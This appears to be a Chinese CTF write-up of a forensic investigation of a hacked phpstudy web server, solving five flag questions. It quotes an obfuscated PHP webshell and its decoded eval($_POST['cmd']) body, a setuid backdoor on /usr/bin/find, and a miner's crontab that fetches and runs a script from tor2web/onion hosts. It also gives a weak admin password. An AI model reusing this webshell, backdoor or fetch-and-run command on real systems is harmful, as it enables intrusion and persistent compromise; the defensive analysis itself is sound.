# 题目 1
黑客的 IP 是? flag 格式:flag {黑客的 ip 地址},如:flag {127.0.0.1}
日志的位置不是默认的 /var/log/nginx,这是一个 phpstudy 部署的站点。直接在 www 目录下搜索 *.log 文件(例如 `find /www -name '*.log' 2>/dev/null`),就能找到 nginx 访问日志。
直接按来源 IP 统计请求数,请求量异常多的基本就是扫描器;但单纯计数只是启发式判断,最好再看一下该 IP 的请求路径(大量 404、目录枚举、后续对 webshell 的访问)做交叉验证。
[root@ip-10-0-10-4 ~]# cat /www/admin/websec_80/log/nginx_access_2023-12-2* | cut -d" " -f1 | sort | uniq -c
      1
    107 192.168.10.1
 287734 192.168.10.135
flag: flag{192.168.10.135}
# 题目 2
黑客攻陷网站的具体时间是? flag 格式:flag {年 - 月 - 日 时:分: 秒},如:flag {2023-12-24 22:23:24}
后台在 8081 端口,用弱口令 admin/12345678 即可登录。
登录后台后,在用户管理里找到黑客留下的新增用户及其登录时间。
从访问日志里登录成功后的 302 跳转其实已经能定位到时间,但与后台记录的登录时间相差几秒(日志记录的是请求时刻,后台记录的是应用写库时刻,也可能存在时区或时钟偏差,具体原因这里无法确认)。
flag 以后台记录的时间为准。
flag: flag{2023-12-22 19:08:34}
# 题目 3
黑客上传 webshell 的名称及密码是? flag 格式:flag {黑客上传的 webshell 名称 - webshell 密码},如:flag {webshell.php-pass}
把 404.php 下载到本机后火绒直接告警。取证时应只读查看这类文件,不要在本机执行或再次上传。
[root@ip-10-0-10-4 ~]# cat /www/admin/websec_80/wwwroot/error/404.php
<?php
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
解码一下:把 webshell 里 eval() 的参数原样取出,只做 base64 解码和 gzuncompress,然后打印出来,而不是执行。
<?php
// Offline decoder for the payload found in 404.php: reverse the base64 layer,
// then the zlib layer, and print the plaintext instead of passing it to eval().
$decoded_string = base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==');
// gzuncompress() undoes the zlib compression applied before base64 encoding.
$uncompressed_string = gzuncompress($decoded_string);
// Print only -- never eval() recovered attacker code.
echo $uncompressed_string;
?>
[root@ip-10-0-10-4 ~]# php decrypt.php
eval($_POST['cmd']);
flag: flag{404.php-cmd}
# 题目 4
黑客提权后设置的后门文件名称是? flag 格式:flag {后门文件绝对路径加上名称},如:flag {/etc/passwd}
[root@ip-10-0-10-1 ~]# history
    1  ip addr
    2  rpm -qa|grep vim
    3  vim
    4  yum -y install vim*
    5  vim
    6  yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh
    7  vim /etc/hosts
    8  ls
    9  cd /var/www/
   10  cd /tmp
   11  vim config.sh
   12  chmod +x config.sh
   13  ll
   14  sh config.sh
   15  history
   16  ls
   17  ifconfig
   18  ip addr
   19  ll
   20  chmod 4775 /usr/bin/find
   21  w
   22  cat /etc/passwd
   23  ip addr
   24  w
历史记录第 20 条给 /usr/bin/find 设置了 4775(setuid 位 + rwxrwxr-x),这样任何本地用户都能借 find 以 root 身份执行命令,是典型的提权后门。可用 `ls -l /usr/bin/find`(权限列应显示为 rwsrwxr-x)确认该后门是否仍在,处置时 `chmod 0755 /usr/bin/find`。注意 bash history 默认不带时间戳,无法据此确定设置的时间。
flag: flag{/usr/bin/find}
# 题目 5
对黑客上传的挖矿病毒进行分析,获取隐藏的 Flag
挖矿病毒一般通过计划任务做持久化,先查看计划任务,直接看到了写入的内容:
[root@ip-10-0-10-4 ~]# cat /etc/crontab | |
SHELL=/bin/bash | |
PATH=/sbin:/bin:/usr/sbin:/usr/bin | |
MAILTO=root | |
# For details see man 4 crontabs | |
# Example of job definition: | |
# .---------------- minute (0 - 59) | |
# | .------------- hour (0 - 23) | |
# | | .---------- day of month (1 - 31) | |
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ... | |
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat | |
# | | | | | | |
# * * * * * user-name command to be executed | |
*/7 * * * * root R=$(shuf -i 1-29 -n 1);
sleep ${R:-0};
BP=$(dirname "$(command -v yes)");
BP=${BP:-"/usr/bin"};G1="curl";
if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then
G1="echo";for f in ${BP}/*;
do
strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;
done;
fi;
G2="wget";
if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then
G2="echo";
for f in ${BP}/*;
do
strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;
done;
fi;
if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then
echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
fi;
C=" -fsSLk --connect-timeout 26 --max-time 75 ";
W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";
H="https://an7kmd2wp4xo7hpr";
T1=".tor2web.su/";
T2=".d2web.org/";
T3=".onion.sh/";
P="src/ldm";
($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
把变量展开后拼接出来的实际下载命令如下(仅用于分析,不要在任何机器上执行——结尾的 `|sh &` 会把远程脚本直接交给 sh 执行,每 7 分钟触发一次;前面那段还会把 /etc/hosts 覆盖掉,清除对 tor2web/onion 域名的屏蔽):
curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm||curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm||curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm |
下载目标是 src/ldm,在磁盘上找一下这个文件是否已经落地:
[root@ip-10-0-10-1 tmp]# find / -name "ldm" 2>/dev/null
/etc/.cache/ldm
[root@ip-10-0-10-1 tmp]# file /etc/.cache/ldm
/etc/.cache/ldm: Bourne-Again shell script, ASCII text executable, with very long lines
脚本是明文 bash,可以直接阅读;不过文件很长,用 `grep -n 'base64\|nohup\|python' /etc/.cache/ldm` 定位比肉眼扫快得多。最后找到这一行:
nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1 |
把 base64 解码出来看看(只解码、不执行):
[root@ip-10-0-10-1 tmp]# echo "aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk=" | base64 -d
import time
while 1:
    print("flag{websec_True@888!}")
    time.sleep(1000)
拿到 flag
flag: flag{websec_True@888!}